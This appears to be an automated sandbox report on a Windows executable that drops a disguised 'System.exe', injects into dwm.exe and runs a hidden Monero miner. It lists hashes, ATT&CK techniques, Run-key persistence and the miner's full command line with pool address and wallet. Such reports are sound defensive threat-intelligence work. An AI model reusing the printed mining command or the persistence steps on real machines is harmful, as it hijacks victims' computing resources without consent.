Analysis

  • max time kernel
    123s
  • max time network
    169s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    21-05-2022 00:39

General

  • Target

    5750a4e7e392665b01ccfdd4af273ccbe096b14516c7a3e0f2fbb068ad25e482.exe

  • Size

    19.2MB

  • MD5

    19263218df8fc863e249a5300abd8856

  • SHA1

    0775d23e9c3aca70961fe1498735c650f441c5df

  • SHA256

    5750a4e7e392665b01ccfdd4af273ccbe096b14516c7a3e0f2fbb068ad25e482

  • SHA512

    cc793a66cf206bf8e48a55e0c84dfc361d44896b5a69534d27b9376bd7d7be59067a667e5077fbea48f40c7841994c57e1bcdfabe14c42d4a59271a9ea4b44a9

Malware Config

Signatures

  • Modifies visibility of file extensions in Explorer 2 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 11 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops file in System32 directory 7 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 33 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5750a4e7e392665b01ccfdd4af273ccbe096b14516c7a3e0f2fbb068ad25e482.exe
    "C:\Users\Admin\AppData\Local\Temp\5750a4e7e392665b01ccfdd4af273ccbe096b14516c7a3e0f2fbb068ad25e482.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1480
    • C:\Users\Admin\AppData\Roaming\System.exe
      "C:\Users\Admin\AppData\Roaming\System.exe"
      2⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:588
      • C:\Windows\System32\dwm.exe
        C:\Windows\System32\dwm.exe -B -a cryptonight --donate-level=1 --url=gulf.moneroocean.stream:10001 -u 43NsyECLTgtEFJ3cbXQAHCe7dvuijrjXENAEZWPucGh6GgdHC5eYHHcXNjyvSDeK4QfaXSbg8rQTw1EiCmZnmpuY9d8MxqY -p Admin -k --randomx-mode=light --cpu-priority=0 -t 1
        3⤵
          PID:1620
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k netsvcs
      1⤵
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Suspicious behavior: LoadsDriver
      • Suspicious use of AdjustPrivilegeToken
      PID:1248

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Persistence

    Hidden Files and Directories

    1
    T1158

    Registry Run Keys / Startup Folder

    1
    T1060

    Defense Evasion

    Hidden Files and Directories

    1
    T1158

    Modify Registry

    2
    T1112

    Discovery

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\System.exe
      Filesize

      19.2MB

      MD5

      19263218df8fc863e249a5300abd8856

      SHA1

      0775d23e9c3aca70961fe1498735c650f441c5df

      SHA256

      5750a4e7e392665b01ccfdd4af273ccbe096b14516c7a3e0f2fbb068ad25e482

      SHA512

      cc793a66cf206bf8e48a55e0c84dfc361d44896b5a69534d27b9376bd7d7be59067a667e5077fbea48f40c7841994c57e1bcdfabe14c42d4a59271a9ea4b44a9

    • C:\Users\Admin\AppData\Roaming\System.exe
      Filesize

      19.2MB

      MD5

      19263218df8fc863e249a5300abd8856

      SHA1

      0775d23e9c3aca70961fe1498735c650f441c5df

      SHA256

      5750a4e7e392665b01ccfdd4af273ccbe096b14516c7a3e0f2fbb068ad25e482

      SHA512

      cc793a66cf206bf8e48a55e0c84dfc361d44896b5a69534d27b9376bd7d7be59067a667e5077fbea48f40c7841994c57e1bcdfabe14c42d4a59271a9ea4b44a9

    • \Users\Admin\AppData\Roaming\System.exe
      Filesize

      19.2MB

      MD5

      19263218df8fc863e249a5300abd8856

      SHA1

      0775d23e9c3aca70961fe1498735c650f441c5df

      SHA256

      5750a4e7e392665b01ccfdd4af273ccbe096b14516c7a3e0f2fbb068ad25e482

      SHA512

      cc793a66cf206bf8e48a55e0c84dfc361d44896b5a69534d27b9376bd7d7be59067a667e5077fbea48f40c7841994c57e1bcdfabe14c42d4a59271a9ea4b44a9

    • memory/588-57-0x0000000000000000-mapping.dmp
    • memory/588-60-0x0000000000370000-0x0000000000378000-memory.dmp
      Filesize

      32KB

    • memory/1480-54-0x0000000000400000-0x0000000001734000-memory.dmp
      Filesize

      19.2MB

    • memory/1480-55-0x000007FEFB6D1000-0x000007FEFB6D3000-memory.dmp
      Filesize

      8KB

    • memory/1620-70-0x0000000000400000-0x0000000000873000-memory.dmp
      Filesize

      4.4MB

    • memory/1620-76-0x0000000000400000-0x0000000000873000-memory.dmp
      Filesize

      4.4MB

    • memory/1620-64-0x0000000000400000-0x0000000000873000-memory.dmp
      Filesize

      4.4MB

    • memory/1620-66-0x0000000000400000-0x0000000000873000-memory.dmp
      Filesize

      4.4MB

    • memory/1620-68-0x0000000000400000-0x0000000000873000-memory.dmp
      Filesize

      4.4MB

    • memory/1620-61-0x0000000000400000-0x0000000000873000-memory.dmp
      Filesize

      4.4MB

    • memory/1620-72-0x0000000000400000-0x0000000000873000-memory.dmp
      Filesize

      4.4MB

    • memory/1620-73-0x0000000000400000-0x0000000000873000-memory.dmp
      Filesize

      4.4MB

    • memory/1620-75-0x0000000000400000-0x0000000000873000-memory.dmp
      Filesize

      4.4MB

    • memory/1620-62-0x0000000000400000-0x0000000000873000-memory.dmp
      Filesize

      4.4MB

    • memory/1620-78-0x0000000000400000-0x0000000000873000-memory.dmp
      Filesize

      4.4MB

    • memory/1620-80-0x0000000000400000-0x0000000000873000-memory.dmp
      Filesize

      4.4MB

    • memory/1620-81-0x00000000004014F0-mapping.dmp
    • memory/1620-83-0x0000000000400000-0x0000000000873000-memory.dmp
      Filesize

      4.4MB

    • memory/1620-84-0x0000000000400000-0x0000000000873000-memory.dmp
      Filesize

      4.4MB

    • memory/1620-85-0x00000000001A0000-0x00000000001B0000-memory.dmp
      Filesize

      64KB

    • memory/1620-86-0x0000000000000000-0x0000000000200000-memory.dmp
      Filesize

      2.0MB